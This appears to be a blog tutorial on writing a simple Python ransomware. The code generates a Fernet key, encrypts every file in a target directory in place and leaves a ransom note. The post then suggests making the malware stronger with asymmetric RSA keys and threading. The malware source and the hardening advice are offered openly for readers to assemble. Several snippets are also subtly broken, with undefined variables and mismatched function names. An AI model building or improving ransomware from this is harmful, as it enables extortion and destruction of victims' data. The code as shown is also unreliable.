Create and understand how to reverse a simple malware Link to heading

Introduction Link to heading

The purpose of this article is to create a simple malware(ransomware), understand how it is possible to reverse it(when it’s possible) and see some ways to improve the malware. This is what I saw in one of my courses last year and I really want to did an article about this topic because this is related to one of some current threat in cybersecurity. A malware refers to any intrusive software developed by malicious attackers to steal data and damage or destroy computers.

If you want to reproduce the malware, please do it for educational purpose only and in a virtual machine to prevent any damages. I am not responsible of your actions with using the following code.

Malware creation Link to heading

In this part I am going to analyse the main part of the malware, you can assemble all the code to retrieve the entire file. Firstly, we need to create a directory with a text file and the sentence of your choice in it which is the one we will take as example.

from cryptography.fernet import Fernet

def key_gen():
    clef=Fernet.generate_key()
    with open("clef.key",'wb') as key_file:
        key_file.write(clef)

Fernet library and more precisely cryptography class permit us to use symmetric encryption. This type of encryption means that we need the key to both encrypt and decrypt the text. Anyone who doesn’t have access to the key can’t decrypt the message. The code above use generate_key function to as indicate in the name generate our key and write it in clef.key file(write-binary opening mode). If the key is lose or stolen by malicious attacker, the message can’t be decrypt in the first case and the stealer can read the encrypt message in the second.

def key_loading():
    return open('clef.key','rb').read()

This function opened the previously created file and load the key inside to use it in the encryption file of the directory.

def encrypt_all(items,clef):
    f=Fernet(clef)
    for items in items:
        with open(item,'rb') as File:
            file_data=File.read()
        encrypted_data=f.encrypt(file_data)
        with open(item,'wb') as File:
            File.write(encrypted_data)

This is the most important function in the code. The purpose of it is to encrypt all the data file in the targeted repository. Fernet function create an instance with the key, this instance allow to encrypt the data as seen in the encrypted_data line. After, we load all the file in the repository with the first “with” loop and encrypt the loaded data file with the second.

path=['confidential' + '/' + item for item in items]
key_generation()
clef=key_loading()
encrypt_all(path,clef)
money()

Money function is define to make the ransomware more realist with some instructions inside, for example a ransom demand. To conclude this part, we choose the target path in the variable path(here the path is “confidential”), we generate the key and load it in clef file. Finally, the encrypt_all function is used with the path and the previously loaded key parameters.

Analysis Link to heading

By executing the python code, the ‘confidential’ directory is completely unreadable and data can be lose. A file containing instructions to retrieve the decipher key has been created with “ransom payment”. But the code and more precisely key file have some vulnerabilities. The first major is the symmetrical cryptography, this means you have one key to both cipher and decipher the files. This is why symmetric cipher is not currently used nowadays, if someone find the symmetrical key, he may decipher the content of the directory.
Another point to notice is the storage location of the key. Indeed, the key is stored on the computer so the user can retrieve it and use it to decipher the targeted directory.

Improvement Link to heading

Some easy improvements are possible to have a stronger ransomware. Concerning the encryption key used, it is better to use an asymmetrical encrpytion protocol with a public/private key pair in order to have one for cipher(public) and the other for decipher(private). An algorithm such as RSA will well works for this purpose. This improvement act to hide the storage location of the key too because we only need to have the public key to cipher and keep the private key in a “safe place”. Another point to take into account is the performance of the ransomware. The current code is not very efficiency with a lot of directory and files, it is possible to increase the overall performance with using python threading. Threading allow us to browse all files concurrently in a way to reduce the execution time when a lot of files is contained in the targeted directory.

Conclusion Link to heading

In this article we saw what is a malware and more precisely a ransomware, the step to construct it and the works of each parts. The last two parts talks about analysis and possible improvements of the malware. Once time again, this article is on an educational purpose only so please if you want to reproduce it be sure to execute it on a controlled environnement.